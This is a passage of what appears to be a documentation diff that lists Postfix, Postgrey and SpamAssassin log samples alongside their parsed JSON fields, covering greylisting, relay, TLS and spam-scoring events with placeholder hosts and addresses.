"outcome": "success", + "reason": "early-retry (10s missing)", + "type": [ + "info" + ] + }, + "action": { + "name": "greylist", + "outcome": "success", + "outcome_reason": "early-retry (10s missing)", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey2.json" + + 
```json + + { + "message": "action=greylist, reason=new, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "new", + "type": [ + "info" + ] + }, + "action": { + "name": "greylist", + "outcome": "success", + "outcome_reason": "new", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey3.json" + + ```json + + { + "message": "action=greylist, reason=new, client_name=unknown, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "new", + "type": [ + "info" + ] + }, + "action": { + "name": "greylist", + "outcome": "success", + "outcome_reason": "new", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "domain": "example.org", + "ip": "1.2.3.4" + } + } + + ``` + + +=== 
"wo_appname_postgrey4.json" + + ```json + + { + "message": "action=pass, reason=client AWL, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client AWL", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client AWL", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey5.json" + + ```json + + { + "message": "action=pass, reason=client whitelist, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "client whitelist", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "client whitelist", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": 
"mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey6.json" + + ```json + + { + "message": "action=pass, reason=triplet found, client_name=mx.example.org, client_address=1.2.3.4/32, sender=jdoe@example.org, recipient=jane.doe@example.com", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "reason": "triplet found", + "type": [ + "info" + ] + }, + "action": { + "name": "pass", + "outcome": "success", + "outcome_reason": "triplet found", + "target": "network-traffic" + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey7.json" + + ```json + + { + "message": "whitelisted: mx.example.org[1.2.3.4/32]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "1.2.3.4", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_postgrey8.json" + + ```json + + { + "message": "whitelisted: unknown[1.2.3.4/32]", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + 
"ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + } + } + + ``` + + +=== "wo_appname_qmgr.json" + + ```json + + { + "message": "89BE920002: from=, size=152518, nrcpt=1 (queue active)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "test1@acme.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "acme.com" + ] + }, + "source": { + "address": "acme.com", + "domain": "acme.com", + "registered_domain": "acme.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_qmgr2.json" + + ```json + + { + "message": "074955F67C: from=, size=4303, nrcpt=1 (queue active)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "bounce+41deb4.277afa-Heather.STEWART=corp.com@hrd.corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "hrd.corp.com" + ] + }, + "source": { + "address": "hrd.corp.com", + "domain": "hrd.corp.com", + "registered_domain": "corp.com", + "subdomain": "hrd", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_queued.json" + + ```json + + { + "message": "CA9311112C08: to=, relay=srv.corp.com[1.1.1.1]:25, delay=8.4, delays=7.6/0/0.31/0.47, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 4TwNdH5zwCz7fxV) 257", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "1.1.1.1", + "domain": "srv.corp.com", + "ip": "1.1.1.1", + "port": 25 + }, + "email": { + "to": { + "address": [ + "f.lastname@corp.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "srv.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_relay.json" + + ```json + + { + 
"message": "56E28C0007: to=, relay=1.1.1.1[1.1.1.1]:10025, delay=0.63, delays=0.57/0/0.05/0.01, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as DF82A21108)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "1.1.1.1", + "domain": "1.1.1.1", + "ip": "1.1.1.1", + "port": 10025 + }, + "email": { + "to": { + "address": [ + "rob@exemple.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "1.1.1.1" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_replace_header.json" + + ```json + + { + "message": "95BCC140E40: replace: header From: EXAMPLE <[hola@example.org](mailto:hola@example.org)>: From: [noreply@example.org](mailto:noreply@example.org)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "hola@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "headers": { + "from": [ + "EXAMPLE <[hola@example.org](mailto:hola@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, + "related": { + "hosts": [ + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_replace_header_1.json" + + ```json + + { + "message": "95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: 
From: [noreply@example.org](mailto:noreply@example.org)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "from": { + "address": [ + "test@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "headers": { + "from": [ + "Example Mailbox <[test@example.org](mailto:test@example.org)>", + "[noreply@example.org](mailto:noreply@example.org)" + ] + } + }, + "related": { + "hosts": [ + "example.org" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_replace_header_2.json" + + ```json + + { + "message": "2F46A140256: replace: header 
From: \"Example Help\" , orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "foreman-proxy" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_smtp2.json" + + ```json + + { + "message": "1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "target": "network-traffic" + }, + "destination": { + "address": "example.org", + "domain": "example.org", + "registered_domain": "example.org", + "top_level_domain": "org" + }, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "postfix": { + "orig_to": "dmarc@example.org" + }, + "related": { + "hosts": [ + "example.org" + ] + } + } + + ``` + + +=== "wo_appname_smtp3.json" + + ```json + + { + "message": "7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17)", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "sent", + "outcome": "success", + "outcome_reason": "success", + "target": "network-traffic" + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + 
}, + "email": { + "to": { + "address": [ + "jdoe@example.org" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_smtp4.json" + + ```json + + { + "message": "05BC43F81E: host mx.example.org[5.6.7.8] said: 421 4.3.0 Upstream error, please check https://example.com/email-routing/postmaster for possible reasons why. yrtPbwx4hZz2 (in reply to end of DATA command)", + "event": { + "category": [ + "email" + ], + "reason": "Upstream error, please check https://example.com/email-routing/postmaster for possible reasons why. yrtPbwx4hZz2 (in reply to end of DATA command)", + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "mx.example.org", + "ip": "5.6.7.8" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_smtp5.json" + + ```json + + { + "message": "30D713F81F: host mx.example.org[5.6.7.8] said: 450 4.1.1 : Recipient address rejected: unverified address: Mailbox might be disabled, full, or may not exist on the server. Reason: JFE030050 (in reply to RCPT TO command)", + "event": { + "category": [ + "email" + ], + "reason": ": Recipient address rejected: unverified address: Mailbox might be disabled, full, or may not exist on the server. 
Reason: JFE030050 (in reply to RCPT TO command)", + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "mx.example.org", + "ip": "5.6.7.8" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_smtp6.json" + + ```json + + { + "message": "connect to mx.example.org[5.6.7.8]:25: No route to host", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "5.6.7.8", + "domain": "mx.example.org", + "ip": "5.6.7.8", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + } + } + + ``` + + +=== "wo_appname_smtp_connection3_timed_out.json" + + ```json + + { + "message": "connect to mail.corp.com[1.1.1.1]:25: Connection timed out 125", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "1.1.1.1", + "domain": "mail.corp.com", + "ip": "1.1.1.1", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_smtp_relay.json" + + ```json + + { + "message": "96887C0006: to=, relay=exemple.com[1.1.1.1]:25, delay=354776, delays=354775/0/0.9/0.16, dsn=4.3.1, status=deferred (host exemple.com[1.1.1.1] said: 452 4.3.1 Insufficient system storage (in reply to MAIL FROM command))", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "deferred", + "outcome": "success", + "outcome_reason": "The recipient`s mail server is experiencing a Disk Full condition", + "target": "network-traffic" + }, + "destination": { + "address": "1.1.1.1", + "domain": "exemple.com", + "ip": "1.1.1.1", + "port": 25 + }, + "email": { + "to": { + "address": [ + "rob@exemple.com" + ] + } + }, + "network": { + 
"protocol": "smtp" + }, + "related": { + "hosts": [ + "exemple.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_smtpd1.json" + + ```json + + { + "message": "021C03F820: filter: RCPT from mx.example.org[192.168.100.124]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo=", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "example.com", + "domain": "example.com", + "registered_domain": "example.com", + "top_level_domain": "com" + }, + "email": { + "from": { + "address": [ + "jdoe@example.org" + ] + }, + "to": { + "address": [ + "jane.doe@example.com" + ] + } + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.com", + "mx.example.com" + ], + "ip": [ + "192.168.100.124" + ] + }, + "source": { + "address": "mx.example.com", + "domain": "mx.example.com", + "ip": "192.168.100.124", + "registered_domain": "example.com", + "subdomain": "mx", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_smtpd2.json" + + ```json + + { + "message": "lost connection after BDAT from mx.example.org[192.168.100.124]", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "lost connection", + "outcome": "success", + "target": "network-traffic", + "type": "BDAT" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "192.168.100.124" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "192.168.100.124", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_smtpd3.json" + + ```json + + { + "message": "warning: hostname mx.example.org does not resolve to address 5.6.7.8: Name or service not known", + "event": { + "category": [ + "email" + ], + "reason": "Name or service not known", + "type": [ + "info" + ] + }, 
+ "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "5.6.7.8" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "5.6.7.8", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_smtpd4.json" + + ```json + + { + "message": "warning: mx.example.org[192.168.100.132]: SASL LOGIN authentication failed: authentication failure, sasl_username=john.doe@exmaple.org", + "event": { + "category": [ + "email" + ], + "reason": "SASL LOGIN authentication failed: authentication failure, sasl_username=john.doe@exmaple.org", + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "192.168.100.132" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "192.168.100.132", + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_smtpd_connection.json" + + ```json + + { + "message": "lost connection after AUTH from unknown[1.1.1.1]", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "lost connection", + "outcome": "success", + "target": "network-traffic", + "type": "AUTH" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "1.1.1.1", + "ip": "1.1.1.1" + } + } + + ``` + + +=== "wo_appname_smtpd_connection2.json" + + ```json + + { + "message": "connect from unknown[10.1.1.1] 88", + "event": { + "category": [ + "email" + ], + "outcome": "success", + "type": [ + "info" + ] + }, + "action": { + "name": "connect", + "outcome": "success", + "target": "network-traffic" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "ip": [ + "10.1.1.1" + ] + }, + "source": { + "address": "10.1.1.1", + "ip": "10.1.1.1" + 
} + } + + ``` + + +=== "wo_appname_smtpd_tls.json" + + ```json + + { + "message": "Trusted TLS connection established from mail.outbound.protection.outlook.com[1.1.1.1]: TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mail.outbound.protection.outlook.com" + ], + "ip": [ + "1.1.1.1" + ] + }, + "source": { + "address": "mail.outbound.protection.outlook.com", + "domain": "mail.outbound.protection.outlook.com", + "ip": "1.1.1.1", + "registered_domain": "outlook.com", + "subdomain": "mail.outbound.protection", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_smtpd_tls2.json" + + ```json + + { + "message": "Trusted TLS connection established to mx.corp.com[1.1.1.1]:25: TLSv1.3 with cipher TLS_AES_128_GCM_SHA256 (128/128 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "1.1.1.1", + "domain": "mx.corp.com", + "ip": "1.1.1.1", + "port": 25 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.corp.com" + ], + "ip": [ + "1.1.1.1" + ] + } + } + + ``` + + +=== "wo_appname_smtpd_tls3.json" + + ```json + + { + "message": "Trusted TLS connection established to 127.0.0.1[127.0.0.1]:10025: TLSv1.3 with cipher TLS_AES_256_GCM_SHA384 (256/256 bits) key-exchange X25519 server-signature RSA-PSS (2048 bits) server-digest SHA256 201", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 10025 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ] + } + } + + ``` + + +=== "wo_appname_spamd1.json" + + ```json + + { + "message": "spamd: result: . 
-1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,SPF_HELO_NONE,SPF_PASS,T_KAM_HTML_FONT_INVALID scantime=3.4,size=120289,user=debian-spamd,uid=119,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=44944,mid=<11111111111111@uexample.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<11111111111111@uexample.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 44944 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd10.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FORGED_HOTMAIL_RCVD2,FREEMAIL_FROM,HTML_IMAGE_RATIO_04,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.7,size=102578,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45880,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 45880 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd11.json" + + ```json + + { + "message": "spamd: result: . 
-1 - DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,FREEMAIL_REPLYTO_END_DIGIT,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_DNSWL_NONE,SPF_HELO_PASS,SPF_PASS,T_FREEMAIL_DOC_PDF scantime=4.7,size=2252595,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=49594,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 49594 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd12.json" + + ```json + + { + "message": "spamd: result: . -1 - DMARC_PASS,MIME_HEADER_CTYPE_ONLY,MISSING_DATE,MISSING_MID,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=4260,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=46436,mid=(unknown),autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "(unknown)" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 46436 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd13.json" + + ```json + + { + "message": "spamd: result: . 
-1 - FREEMAIL_ENVFROM_END_DIGIT,FREEMAIL_FROM,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=8094,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=39504,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 39504 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd14.json" + + ```json + + { + "message": "spamd: result: . -1 - FREEMAIL_FORGED_FROMDOMAIN,FREEMAIL_FROM,HEADER_FROM_DIFFERENT_DOMAINS,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=61589,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=37172,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 37172 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd15.json" + + ```json + + { + "message": "spamd: result: . 
-1 - HTML_FONT_LOW_CONTRAST,HTML_IMAGE_RATIO_08,HTML_MESSAGE,LOTS_OF_MONEY,MIME_HTML_MOSTLY,MPART_ALT_DIFF,RCVD_IN_MSPIKE_H4,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS scantime=3.3,size=164381,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=56082,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 56082 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd16.json" + + ```json + + { + "message": "spamd: result: . -1 - HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,HTML_OBFUSCATE_05_10,MIME_HTML_ONLY,SPF_HELO_PASS,SPF_PASS scantime=2.5,size=1572,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=51336,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 51336 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd17.json" + + ```json + + { + "message": "spamd: result: . 
